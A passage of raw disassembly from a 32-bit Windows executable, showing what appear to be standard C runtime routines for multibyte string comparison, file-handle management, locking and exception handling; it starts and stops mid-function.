push 1
push dword ptr [eax+4]
lea ecx, [ebp+var_4]
push 2
push ecx
push 2
lea ecx, [ebx-1]
push ecx
push edi
push dword ptr [eax+0Ch]
lea eax, [ebp+var_14]
push eax
call sub_40C6A9
add esp, 24h
cmp eax, 1
jnz short loc_40ECCF
movzx ax, [ebp+var_4]
jmp short loc_40ECE5
; ---------------------------------------------------------------------------
loc_40ECCF: ; CODE XREF: sub_40EB4A+17Cj
cmp eax, 2
jnz short loc_40ED1C
movzx ax, [ebp+var_4]
movzx cx, [ebp+var_3]
shl ax, 8
add ax, cx
loc_40ECE5: ; CODE XREF: sub_40EB4A+183j
movzx ecx, ax
mov eax, [ebp+var_10]
inc ebx
jmp short loc_40ED0A
; ---------------------------------------------------------------------------
loc_40ECEE: ; CODE XREF: sub_40EB4A+14Dj
movzx edx, cx
lea ecx, [edx+eax]
test byte ptr [ecx+1Dh], 10h
jz short loc_40ED07
movzx cx, byte ptr [ecx+11Dh]
movzx ecx, cx
jmp short loc_40ED0A
; ---------------------------------------------------------------------------
loc_40ED07: ; CODE XREF: sub_40EB4A+1AEj
movzx ecx, dx
loc_40ED0A: ; CODE XREF: sub_40EB4A+156j
; sub_40EB4A+1A2j ...
cmp cx, si
jnz short loc_40ED3B
test si, si
jz short loc_40ED50
mov edx, [ebp+arg_0]
jmp loc_40EBFD
; ---------------------------------------------------------------------------
loc_40ED1C: ; CODE XREF: sub_40EB4A+FFj
; sub_40EB4A+188j
call sub_405B83
mov dword ptr [eax], 16h
cmp [ebp+var_8], 0
jz short loc_40ED34
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40ED34: ; CODE XREF: sub_40EB4A+1E1j
mov eax, 7FFFFFFFh
jmp short loc_40ED5F
; ---------------------------------------------------------------------------
loc_40ED3B: ; CODE XREF: sub_40EB4A+1C3j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_8], 0
jz short loc_40ED5F
mov ecx, [ebp+var_C]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40ED5F
; ---------------------------------------------------------------------------
loc_40ED50: ; CODE XREF: sub_40EB4A+1C8j
cmp [ebp+var_8], 0
jz short loc_40ED5D
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40ED5D: ; CODE XREF: sub_40EB4A+20Aj
xor eax, eax
loc_40ED5F: ; CODE XREF: sub_40EB4A+1EFj
; sub_40EB4A+1FBj ...
pop edi
loc_40ED60: ; CODE XREF: sub_40EB4A+7Cj
; sub_40EB4A+9Bj ...
pop ebx
loc_40ED61: ; CODE XREF: sub_40EB4A+45j
pop esi
leave
retn
sub_40EB4A endp
; =============== S U B R O U T I N E =======================================
sub_40ED64 proc near ; CODE XREF: sub_4085AF+1E6p
; sub_4085AF+203p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40EB4A
add esp, 0Ch
retn
sub_40ED64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED77 proc near ; CODE XREF: sub_40EEE0+Ep
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_40ED8C
xor eax, eax
jmp loc_40EEC9
; ---------------------------------------------------------------------------
loc_40ED8C: ; CODE XREF: sub_40ED77+Cj
push edi
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_402AEB
mov edi, [ebp+var_C]
cmp [edi+8], ebx
jnz short loc_40EDC6
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCA9
add esp, 0Ch
cmp [ebp+var_4], bl
jz loc_40EEC8
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40EEC8
; ---------------------------------------------------------------------------
loc_40EDC6: ; CODE XREF: sub_40ED77+27j
cmp [ebp+arg_0], ebx
jnz short loc_40EDF9
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EDEF
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EDEF: ; CODE XREF: sub_40ED77+6Fj
mov eax, 7FFFFFFFh
jmp loc_40EEC8
; ---------------------------------------------------------------------------
loc_40EDF9: ; CODE XREF: sub_40ED77+52j
push esi
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_40EE2F
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EE25
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EE25: ; CODE XREF: sub_40ED77+A5j
mov eax, 7FFFFFFFh
jmp loc_40EEC7
; ---------------------------------------------------------------------------
loc_40EE2F: ; CODE XREF: sub_40ED77+88j
; sub_40ED77+13Cj
mov eax, [ebp+arg_0]
movzx cx, byte ptr [eax]
dec [ebp+arg_8]
movzx ecx, cx
movzx edx, cl
inc eax
test byte ptr [edx+edi+1Dh], 4
mov [ebp+arg_0], eax
jz short loc_40EE76
cmp [ebp+arg_8], ebx
jnz short loc_40EE60
movzx eax, byte ptr [esi]
xor ecx, ecx
test byte ptr [eax+edi+1Dh], 4
jnz short loc_40EEB9
movzx eax, ax
jmp short loc_40EEA6
; ---------------------------------------------------------------------------
loc_40EE60: ; CODE XREF: sub_40ED77+D6j
mov al, [eax]
cmp al, bl
jnz short loc_40EE6A
xor ecx, ecx
jmp short loc_40EE76
; ---------------------------------------------------------------------------
loc_40EE6A: ; CODE XREF: sub_40ED77+EDj
xor edx, edx
inc [ebp+arg_0]
mov dh, cl
mov dl, al
movzx ecx, dx
loc_40EE76: ; CODE XREF: sub_40ED77+D1j
; sub_40ED77+F1j
movzx ax, byte ptr [esi]
movzx eax, ax
movzx edx, al
inc esi
test byte ptr [edx+edi+1Dh], 4
jz short loc_40EEA6
cmp [ebp+arg_8], ebx
jnz short loc_40EE91
loc_40EE8D: ; CODE XREF: sub_40ED77+121j
xor eax, eax
jmp short loc_40EEA6
; ---------------------------------------------------------------------------
loc_40EE91: ; CODE XREF: sub_40ED77+114j
mov dl, [esi]
dec [ebp+arg_8]
cmp dl, bl
jz short loc_40EE8D
xor ebx, ebx
mov bh, al
inc esi
mov bl, dl
movzx eax, bx
xor ebx, ebx
loc_40EEA6: ; CODE XREF: sub_40ED77+E7j
; sub_40ED77+10Fj ...
cmp ax, cx
jnz short loc_40EECC
cmp cx, bx
jz short loc_40EEB9
cmp [ebp+arg_8], ebx
jnz loc_40EE2F
loc_40EEB9: ; CODE XREF: sub_40ED77+E2j
; sub_40ED77+137j
cmp [ebp+var_4], bl
jz short loc_40EEC5
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EEC5: ; CODE XREF: sub_40ED77+145j
xor eax, eax
loc_40EEC7: ; CODE XREF: sub_40ED77+B3j
; sub_40ED77+15Ej ...
pop esi
loc_40EEC8: ; CODE XREF: sub_40ED77+3Dj
; sub_40ED77+4Aj ...
pop edi
loc_40EEC9: ; CODE XREF: sub_40ED77+10j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40EECC: ; CODE XREF: sub_40ED77+132j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_4], bl
jz short loc_40EEC7
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40EEC7
sub_40ED77 endp
; =============== S U B R O U T I N E =======================================
sub_40EEE0 proc near ; CODE XREF: sub_4085AF+1D1p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40ED77
add esp, 10h
retn
sub_40EEE0 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_40EF10
push dword ptr [ebp+8]
call sub_413D26
loc_40EF10: ; DATA XREF: .text:0040EF03o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40EF18: ; DATA XREF: sub_40EF5D+Bo
; .text:0040EFEAo
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40EF5C
mov eax, [esp+14h]
mov ecx, [eax-4]
xor ecx, eax
call sub_402ADC
push ebp
mov ebp, [eax+10h]
mov edx, [eax+28h]
push edx
mov edx, [eax+24h]
push edx
call sub_40EF5D
add esp, 8
pop ebp
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_40EF5C: ; CODE XREF: .text:0040EF28j
retn
; =============== S U B R O U T I N E =======================================
sub_40EF5D proc near ; CODE XREF: .text:0040EF44p
var_20 = dword ptr -20h
var_18 = dword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push ebp
push eax
push 0FFFFFFFEh
push offset loc_40EF18
push large dword ptr fs:0
mov eax, dword_423064
xor eax, esp
push eax
lea eax, [esp+24h+var_20]
mov large fs:0, eax
loc_40EF86: ; CODE XREF: sub_40EF5D:loc_40EFCDj
mov eax, [esp+24h+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40EFCF
cmp [esp+24h+arg_4], 0FFFFFFFFh
jz short loc_40EFA2
cmp esi, [esp+24h+arg_4]
jbe short loc_40EFCF
loc_40EFA2: ; CODE XREF: sub_40EF5D+3Dj
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+24h+var_18], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40EFCD
push 101h
mov eax, [ebx+esi*4+8]
call sub_40F00D
mov eax, [ebx+esi*4+8]
call sub_40F02C
loc_40EFCD: ; CODE XREF: sub_40EF5D+57j
jmp short loc_40EF86
; ---------------------------------------------------------------------------
loc_40EFCF: ; CODE XREF: sub_40EF5D+36j
; sub_40EF5D+43j
mov ecx, [esp+24h+var_20]
mov large fs:0, ecx
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_40EF5D endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset loc_40EF18
jnz short locret_40F003
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40F003
mov eax, 1
locret_40F003: ; CODE XREF: .text:0040EFF1j
; .text:0040EFFCj
retn
; =============== S U B R O U T I N E =======================================
sub_40F004 proc near ; CODE XREF: sub_40C2A0+1Ep
; sub_40C2A0+40p
push ebx
push ecx
mov ebx, offset dword_423FB0
jmp short loc_40F018
sub_40F004 endp
; =============== S U B R O U T I N E =======================================
sub_40F00D proc near ; CODE XREF: sub_408978+6Ep
; sub_4069F0+2099p ...
arg_0 = dword ptr 4
push ebx
push ecx
mov ebx, offset dword_423FB0
mov ecx, [esp+8+arg_0]
loc_40F018: ; CODE XREF: sub_40F004+7j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
push ebp
push ecx
push eax
pop eax
pop ecx
pop ebp
pop ecx
pop ebx
retn 4
sub_40F00D endp
; =============== S U B R O U T I N E =======================================
sub_40F02C proc near ; CODE XREF: sub_408978+7Bp
; sub_40EF5D+6Bp
call eax
retn
sub_40F02C endp
; =============== S U B R O U T I N E =======================================
sub_40F02F proc near ; CODE XREF: sub_40E422+2BBp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
test eax, eax
push esi
push edi
jl short loc_40F093
cmp eax, dword_435808
jnb short loc_40F093
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, eax
sar ecx, 5
lea edi, ds:435820h[ecx*4]
mov ecx, [edi]
cmp dword ptr [esi+ecx], 0FFFFFFFFh
jnz short loc_40F093
cmp dword_423050, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_40F089
sub eax, 0
jz short loc_40F080
dec eax
jz short loc_40F07B
dec eax
jnz short loc_40F089
push ebx
push 0FFFFFFF4h
jmp short loc_40F083
; ---------------------------------------------------------------------------
loc_40F07B: ; CODE XREF: sub_40F02F+42j
push ebx
push 0FFFFFFF5h
jmp short loc_40F083
; ---------------------------------------------------------------------------
loc_40F080: ; CODE XREF: sub_40F02F+3Fj
push ebx
push 0FFFFFFF6h
loc_40F083: ; CODE XREF: sub_40F02F+4Aj
; sub_40F02F+4Fj
call ds:off_41D0B8
loc_40F089: ; CODE XREF: sub_40F02F+3Aj
; sub_40F02F+45j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_40F0A9
; ---------------------------------------------------------------------------
loc_40F093: ; CODE XREF: sub_40F02F+8j
; sub_40F02F+10j ...
call sub_405B83
mov dword ptr [eax], 9
call sub_405B96
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_40F0A9: ; CODE XREF: sub_40F02F+62j
pop edi
pop esi
retn
sub_40F02F endp
; =============== S U B R O U T I N E =======================================
sub_40F0AC proc near ; CODE XREF: sub_408DFD+62p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jl short loc_40F114
cmp ecx, dword_435808
jnb short loc_40F114
mov esi, ecx
and esi, 1Fh
imul esi, 28h
mov eax, ecx
sar eax, 5
lea edi, ds:435820h[eax*4]
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_40F114
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_40F114
cmp dword_423050, 1
jnz short loc_40F10A
sub ecx, ebx
jz short loc_40F101
dec ecx
jz short loc_40F0FC
dec ecx
jnz short loc_40F10A
push ebx
push 0FFFFFFF4h
jmp short loc_40F104
; ---------------------------------------------------------------------------
loc_40F0FC: ; CODE XREF: sub_40F0AC+46j
push ebx
push 0FFFFFFF5h
jmp short loc_40F104
; ---------------------------------------------------------------------------
loc_40F101: ; CODE XREF: sub_40F0AC+43j
push ebx
push 0FFFFFFF6h
loc_40F104: ; CODE XREF: sub_40F0AC+4Ej
; sub_40F0AC+53j
call ds:off_41D0B8
loc_40F10A: ; CODE XREF: sub_40F0AC+3Fj
; sub_40F0AC+49j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_40F129
; ---------------------------------------------------------------------------
loc_40F114: ; CODE XREF: sub_40F0AC+Bj
; sub_40F0AC+13j ...
call sub_405B83
mov dword ptr [eax], 9
call sub_405B96
mov [eax], ebx
or eax, 0FFFFFFFFh
loc_40F129: ; CODE XREF: sub_40F0AC+66j
pop edi
pop esi
pop ebx
retn
sub_40F0AC endp
; =============== S U B R O U T I N E =======================================
sub_40F12D proc near ; CODE XREF: sub_408DFD+7p
; sub_408DFD+2Fp ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40F14D
call sub_405B96
and dword ptr [eax], 0
call sub_405B83
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40F14D: ; CODE XREF: sub_40F12D+7j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40F176
cmp eax, dword_435808
jnb short loc_40F176
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_435820[ecx*4]
add eax, ecx
test byte ptr [eax+4], 1
jnz short loc_40F19A
loc_40F176: ; CODE XREF: sub_40F12D+25j
; sub_40F12D+2Dj
call sub_405B96
mov [eax], esi
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40F19A: ; CODE XREF: sub_40F12D+47j
mov eax, [eax]
pop esi
retn
sub_40F12D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F19E proc near ; CODE XREF: sub_408E91+7Fp
; sub_40A6FF+7Fp ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421BC0
call __SEH_prolog4
mov edi, [ebp+arg_0]
mov eax, edi
sar eax, 5
mov esi, edi
and esi, 1Fh
imul esi, 28h
add esi, dword_435820[eax*4]
mov [ebp+var_1C], 1
xor ebx, ebx
cmp [esi+8], ebx
jnz short loc_40F205
push 0Ah
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi+8], ebx
jnz short loc_40F1F9
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CEC4
pop ecx
pop ecx
test eax, eax
jnz short loc_40F1F6
mov [ebp+var_1C], ebx
loc_40F1F6: ; CODE XREF: sub_40F19E+53j
inc dword ptr [esi+8]
loc_40F1F9: ; CODE XREF: sub_40F19E+3Fj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F235
loc_40F205: ; CODE XREF: sub_40F19E+2Fj
cmp [ebp+var_1C], ebx
jz short loc_40F227
mov eax, edi
sar eax, 5
and edi, 1Fh
imul edi, 28h
mov eax, dword_435820[eax*4]
lea eax, [eax+edi+0Ch]
push eax
call ds:dword_41D164 ; RtlEnterCriticalSection
loc_40F227: ; CODE XREF: sub_40F19E+6Aj
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40F19E endp
; =============== S U B R O U T I N E =======================================
sub_40F230 proc near ; DATA XREF: fabskl8p:00421BD8o
xor ebx, ebx
mov edi, [ebp+8]
sub_40F230 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F235 proc near ; CODE XREF: sub_40F19E+62p
push 0Ah
call sub_405CCF
pop ecx
retn
sub_40F235 endp
; =============== S U B R O U T I N E =======================================
sub_40F23E proc near ; CODE XREF: sub_408F54+3p
; sub_40A7D1+3p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_435820[ecx*4]
lea eax, [ecx+eax+0Ch]
push eax
call ds:dword_41D168 ; RtlLeaveCriticalSection
retn
sub_40F23E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F260 proc near ; CODE XREF: sub_40E422:loc_40E618p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040F33C SIZE 000000BA BYTES
push 18h
push offset dword_421BE0
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor edi, edi
mov [ebp+var_24], edi
push 0Bh
call sub_405CE4
pop ecx
test eax, eax
jnz short loc_40F289
or eax, 0FFFFFFFFh
jmp loc_40F3F0
; ---------------------------------------------------------------------------
loc_40F289: ; CODE XREF: sub_40F260+1Fj
push 0Bh
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], edi
loc_40F294: ; CODE XREF: sub_40F260+109j
mov [ebp+var_28], edi
cmp edi, 40h
jge loc_40F3E1
mov esi, dword_435820[edi*4]
test esi, esi
jz loc_40F36E
loc_40F2AF: ; CODE XREF: sub_40F260+CBj
mov [ebp+var_20], esi
mov eax, dword_435820[edi*4]
add eax, 500h
cmp esi, eax
jnb loc_40F362
test byte ptr [esi+4], 1
jnz short loc_40F328
cmp dword ptr [esi+8], 0
jnz short loc_40F30B
push 0Ah
call sub_405DA7
pop ecx
xor ebx, ebx
inc ebx
mov [ebp+ms_exc.disabled], ebx
cmp dword ptr [esi+8], 0
jnz short loc_40F302
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CEC4
pop ecx
pop ecx
test eax, eax
jnz short loc_40F2FF
mov [ebp+var_24], ebx
jmp short loc_40F302
; ---------------------------------------------------------------------------
loc_40F2FF: ; CODE XREF: sub_40F260+98j
inc dword ptr [esi+8]
loc_40F302: ; CODE XREF: sub_40F260+84j
; sub_40F260+9Dj
and [ebp+ms_exc.disabled], 0
call sub_40F333
loc_40F30B: ; CODE XREF: sub_40F260+70j
cmp [ebp+var_24], 0
jnz short loc_40F328
lea ebx, [esi+0Ch]
push ebx
call ds:dword_41D164 ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_40F33C
push ebx
call ds:dword_41D168 ; RtlLeaveCriticalSection
loc_40F328: ; CODE XREF: sub_40F260+6Aj
; sub_40F260+AFj ...
add esi, 28h
jmp short loc_40F2AF
sub_40F260 endp
; =============== S U B R O U T I N E =======================================
sub_40F32D proc near ; DATA XREF: fabskl8p:00421C04o
mov edi, [ebp-28h]
mov esi, [ebp-20h]
sub_40F32D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F333 proc near ; CODE XREF: sub_40F260+A6p
push 0Ah
call sub_405CCF
pop ecx
retn
sub_40F333 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40F260
loc_40F33C: ; CODE XREF: sub_40F260+BFj
cmp [ebp+var_24], 0
jnz short loc_40F328
mov byte ptr [esi+4], 1
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, dword_435820[edi*4]
cdq
push 28h
pop ecx
idiv ecx
mov ecx, edi
shl ecx, 5
add eax, ecx
mov [ebp+var_1C], eax
loc_40F362: ; CODE XREF: sub_40F260+60j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_40F3E1
inc edi
jmp loc_40F294
; ---------------------------------------------------------------------------
loc_40F36E: ; CODE XREF: sub_40F260+49j
push 28h
push 20h
call sub_407B2A
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_40F3E1
lea ecx, ds:435820h[edi*4]
mov [ecx], eax
add dword_435808, 20h
loc_40F390: ; CODE XREF: sub_40F260+151j
mov edx, [ecx]
add edx, 500h
cmp eax, edx
jnb short loc_40F3B3
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
add eax, 28h
mov [ebp+var_20], eax
jmp short loc_40F390
; ---------------------------------------------------------------------------
loc_40F3B3: ; CODE XREF: sub_40F260+13Aj
shl edi, 5
mov [ebp+var_1C], edi
mov eax, edi
sar eax, 5
mov ecx, edi
and ecx, 1Fh
imul ecx, 28h
mov eax, dword_435820[eax*4]
mov byte ptr [eax+ecx+4], 1
push edi
call sub_40F19E
pop ecx
test eax, eax
jnz short loc_40F3E1
or [ebp+var_1C], 0FFFFFFFFh
loc_40F3E1: ; CODE XREF: sub_40F260+3Aj
; sub_40F260+106j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F3F6
mov eax, [ebp+var_1C]
loc_40F3F0: ; CODE XREF: sub_40F260+24j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40F260
; =============== S U B R O U T I N E =======================================
sub_40F3F6 proc near ; CODE XREF: sub_40F260+188p
; DATA XREF: fabskl8p:00421BF8o
push 0Bh
call sub_405CCF
pop ecx
retn
sub_40F3F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3FF proc near ; CODE XREF: sub_408FEC+31p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_421C08
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40F426
call sub_405B83
mov dword ptr [eax], 9
loc_40F41E: ; CODE XREF: sub_40F3FF+4Dj
or eax, 0FFFFFFFFh
jmp loc_40F4D0
; ---------------------------------------------------------------------------
loc_40F426: ; CODE XREF: sub_40F3FF+12j
xor ebx, ebx
cmp eax, ebx
jl short loc_40F434
cmp eax, dword_435808
jb short loc_40F44E
loc_40F434: ; CODE XREF: sub_40F3FF+2Bj
; sub_40F3FF+6Dj
call sub_405B83
mov dword ptr [eax], 9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403305
add esp, 14h
jmp short loc_40F41E
; ---------------------------------------------------------------------------
loc_40F44E: ; CODE XREF: sub_40F3FF+33j
mov ecx, eax
sar ecx, 5
lea edi, ds:435820h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [edi]
movzx ecx, byte ptr [esi+ecx+4]
and ecx, 1
jz short loc_40F434
push eax
call sub_40F19E
pop ecx
mov [ebp+ms_exc.disabled], ebx
mov eax, [edi]
test byte ptr [esi+eax+4], 1
jz short loc_40F4B2
push [ebp+arg_0]
call sub_40F12D
pop ecx
push eax
call ds:off_41D0B4
test eax, eax
jnz short loc_40F4A0
call ds:dword_41D0EC ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_40F4A3
; ---------------------------------------------------------------------------
loc_40F4A0: ; CODE XREF: sub_40F3FF+94j
mov [ebp+var_1C], ebx
loc_40F4A3: ; CODE XREF: sub_40F3FF+9Fj
cmp [ebp+var_1C], ebx
jz short loc_40F4C1
call sub_405B96
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_40F4B2: ; CODE XREF: sub_40F3FF+80j
call sub_405B83
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_40F4C1: ; CODE XREF: sub_40F3FF+A7j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F4D6
mov eax, [ebp+var_1C]
loc_40F4D0: ; CODE XREF: sub_40F3FF+22j
call __SEH_epilog4
retn
sub_40F3FF endp
; =============== S U B R O U T I N E =======================================
sub_40F4D6 proc near ; CODE XREF: sub_40F3FF+C9p
; DATA XREF: fabskl8p:00421C20o
push dword ptr [ebp+8]
call sub_40F23E
pop ecx
retn
sub_40F4D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F4E0 proc near ; CODE XREF: sub_40F52F+21p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_402AEB
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F510
lea eax, [ebp+var_10]
push eax
push 4
push [ebp+arg_0]
call sub_40CDF4
add esp, 0Ch
jmp short loc_40F520
; ---------------------------------------------------------------------------
loc_40F510: ; CODE XREF: sub_40F4E0+1Bj
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
loc_40F520: ; CODE XREF: sub_40F4E0+2Ej
cmp [ebp+var_4], 0
jz short locret_40F52D
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F52D: ; CODE XREF: sub_40F4E0+44j
leave
retn
sub_40F4E0 endp
; =============== S U B R O U T I N E =======================================
sub_40F52F proc near ; CODE XREF: sub_409217+1B6p
; sub_409217+3EFp ...
arg_0 = dword ptr 4
cmp dword_427940, 0
jnz short loc_40F54A
mov eax, [esp+arg_0]
mov ecx, off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
retn
; ---------------------------------------------------------------------------
loc_40F54A: ; CODE XREF: sub_40F52F+7j
push 0
push [esp+4+arg_0]
call sub_40F4E0
pop ecx
pop ecx
retn
sub_40F52F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F558 proc near ; CODE XREF: sub_40F5AC+23p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_402AEB
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F58B
lea eax, [ebp+var_10]
push eax
push 80h
push [ebp+arg_0]
call sub_40CDF4
add esp, 0Ch
jmp short loc_40F59D
; ---------------------------------------------------------------------------
loc_40F58B: ; CODE XREF: sub_40F558+1Bj
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
loc_40F59D: ; CODE XREF: sub_40F558+31j
cmp [ebp+var_4], 0
jz short locret_40F5AA
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F5AA: ; CODE XREF: sub_40F558+49j
leave
retn
sub_40F558 endp
; =============== S U B R O U T I N E =======================================
sub_40F5AC proc near ; CODE XREF: sub_409217+9DFp
; sub_409217+AB7p
arg_0 = dword ptr 4
cmp dword_427940, 0
jnz short loc_40F5C9
mov eax, [esp+arg_0]
mov ecx, off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 80h
retn
; ---------------------------------------------------------------------------
loc_40F5C9: ; CODE XREF: sub_40F5AC+7j
push 0
push [esp+4+arg_0]
call sub_40F558
pop ecx
pop ecx
retn
sub_40F5AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F5D7 proc near ; CODE XREF: sub_40F626+21p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
